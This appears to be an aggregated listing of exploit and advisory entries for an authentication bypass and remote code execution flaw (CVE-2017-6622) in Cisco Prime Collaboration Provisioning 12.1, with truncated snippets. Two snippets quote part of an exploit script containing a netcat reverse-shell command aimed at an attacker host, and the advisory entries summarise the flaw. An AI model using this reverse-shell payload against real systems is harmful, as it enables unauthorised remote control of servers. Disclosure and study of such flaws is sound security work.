Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution

Cisco Prime Collaboration Provisioning 12.1 - Authentication Bypass Remote Code Execution Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "...

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

Cisco Prime Collaboration Provisioning ScriptMgr Authentication Bypass (CVE-2017-6622)

An authentication bypass vulnerability has been reported in Cisco Prime Collaboration Provisioning. The vulnerability is due to insufficient validation on user supplied paths when a request is sent to ScriptMgr servlet. A remote, unauthenticated attacker can exploit this vulnerability by sending ...

Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco Prime Collaboration Provisioning. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ScriptMgr servlet, which listens on TCP port 443 by default...